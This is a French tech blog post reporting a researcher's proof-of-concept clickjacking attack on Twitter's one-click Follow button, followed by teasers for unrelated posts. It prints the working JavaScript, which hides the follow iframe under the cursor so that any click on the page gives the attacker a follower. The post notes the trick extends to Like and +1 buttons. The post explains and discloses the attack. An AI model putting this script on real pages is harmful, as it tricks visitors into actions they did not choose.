Korben, roi d’internet, logo bébé avec des lunettes en mode thug life Korben, roi d’internet, logo bébé avec des lunettes en mode thug life

Korben Upgrade your mind

Twitter à nouveau victime d’un clickjacking

Peu de temps après la mise à disposition par Twitter d’un bouton « Follow » qui permet en 1 click de suivre quelqu’un sur Twitter, Pierre, un chercheur en sécurité a mis au point un proof of concept de click jacking assez fourbe. L’idée est qu’en masquant une iframe contenant un bouton de follow twitter, avec un petit coup de CSS et en en capturant avec du javascript les déplacements de la souris afin de positionner cette iframe sous le curseur de la victime, peu importe l’endroit où celle-ci clique dans la page, hop ça fera des followers de plus à l’attaquant.

Diabolique !

if (!document.getElementsByClassName){
 document.getElementsByClassName = function(classname){
   for (i=0; i < document.getElementsByTagName("*").length; i++)
    {
    if (document.getElementsByTagName("*").item(i).className == classname){
    return new Array(document.getElementsByTagName("*").item(i));
    }
  }
 }
}

var twitterFollowIframe = document.getElementsByClassName('twitter-follow-button')[0];
twitterFollowIframe.style.position = 'absolute';
twitterFollowIframe.style.opacity = '0.2';
twitterFollowIframe.style.filter = 'alpha(opacity=20)';

document.onmousemove = function(e){
        if ( !e ) e = window.event;
        twitterFollowIframe.style.left = e.clientX - 20;
        twitterFollowIframe.style.top = e.clientY - 10;
}

Si vous voulez voir une démo live du PoC, cliquez ici. Il a mis la transparence à 40% pour que vous puissiez voir le bouton twitter sous votre souris, mais sachez qu’en la mettant à 100%, ce sera totalement invisible.

Oups 😉

Evidemment, comme vous me l’avez fait remarqué dans les commentaires, cette technique de click jacking peut aussi s’appliquer à d’autres choses comme le Like de Facebook ou le +1 de Google. Les système d’abonnement ou de vote 1 click seront toujours à la merci de ce genre de choses.

Merci à John Jean pour l’info

[Source et photo]


Installer le shell Bash (Linux) sous Windows 10

L’année dernière, ça ne vous a pas échappé, Bash a fait son apparition sous Windows 10. C’est pour moi, la meilleure chose qui soit arrivée à Windows depuis un moment, car ça permet de lancer des outils Linux et de développer ses propres scripts Shell directement sous Windows. Le pied !

Mais même si c’est parfaitement fonctionnel, il faut quand même…

Lire la suite


Plus de 60 idées pour votre Raspberry Pi

Nous sommes nombreux à nous être procuré un petit ordinateur Raspberry Pi pour nous lancer dans des projets de ouf malade… C’est très cool, mais à part le classique Media Center XBMC, qu’avez-vous fait avec votre Raspberry Pi ?

Si vous séchez niveau idées, voici une petite sélection…

Lire la suite


Une astuce pour rendre Windows 10 plus rapide

Si vous trouvez que Windows 10 est un peu lent, que vos applications ne se lancent pas très vite, que vos compilations prennent du temps, voici une petite astuce débusquée par Brominou pour accélérer le bouzin.

Cliquez dans la zone de recherche de la barre Windows et tapez le mot clé « Performances ». Puis cliquez sur « Régler l’apparence et les performances de Windows » …

Lire la suite


Changer d’adresse IP rapidement

Une petite astuce pour ceux qui ne connaissent pas. Comment changer d’adresse IP à la volée.
Il suffit d’en demander une nouvelle à son provider si celui-ci accepte les IP dynamiques. Pour vérifier que vos manipulation ont eu l’effet escompté, vérifiez quelle est votre adresse IP….

Lire la suite